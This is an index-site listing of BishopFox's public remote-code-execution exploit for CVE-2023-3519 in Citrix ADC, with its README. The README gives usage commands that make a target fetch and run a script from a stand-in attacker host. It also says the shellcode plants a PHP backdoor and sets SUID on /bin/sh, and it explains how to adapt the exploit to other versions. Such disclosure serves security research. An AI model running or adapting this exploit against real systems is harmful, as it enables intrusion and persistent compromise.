Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BishopFox/CVE-2023-3519
RCE exploit for CVE-2023-3519
https://github.com/BishopFox/CVE-2023-3519
Last synced: 3 months ago
JSON representation
RCE exploit for CVE-2023-3519
- Host: GitHub
- URL: https://github.com/BishopFox/CVE-2023-3519
- Owner: BishopFox
- Created: 2023-07-21T20:17:43.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-08-23T16:27:28.000Z (over 1 year ago)
- Last Synced: 2023-11-07T20:12:29.415Z (about 1 year ago)
- Language: Python
- Size: 5.86 KB
- Stars: 206
- Watchers: 3
- Forks: 39
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - BishopFox/CVE-2023-3519 - RCE exploit for CVE-2023-3519 (Python)
README
# Citrix ADC RCE CVE-2023-3519
This exploit uses addresses and shellcode for Citrix VPX 13.1-48.47. For the full writeup, click [here](https://bishopfox.com/blog/analysis-exploitation-cve-2023-3519).
### Usage
NASM is required to build the shellcode.
```
$ sudo apt install nasm
```
The included shellcode will download and run a shell script from a remote http(s) server. The script takes 3 arguments: the target host, the target port, and the URL of a shell script payload. An example payload which runs `id` and `uname -a` before cleaning up after itself is included in this repo.
```
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a
```
The URL must be short enough to fit in the shellcode buffer, and you will get a warning if it is too long.
### Shellcode artifacts
The shellcode will create a PHP backdoor in `/var/netscaler/logon/a.php` and set the SUID bit on `/bin/sh`. The included `sh` payload shows an example of automatically cleaning up these artifacts. Also note that the shellcode does not close its file descriptors, so excessive repeated exploitation may result in resource exhaustion.
### Adapting to other versions
For FreeBSD-based Citrix targets, you should only need to find 3 values: the offset of the saved return pointer, a `jmp rsp` ROP gadget (or something equivalent, such as `push rsp; ret;`), and the address to jump to in order to avoid a crash. These parameters are all hardcoded near the top of `cve-2023-3519.py`. For certain versions you may also need to find a fourth value to fixup the RBP value, since the compiler generates RBP-relative loads instead of using POP instructions to restore saved registers.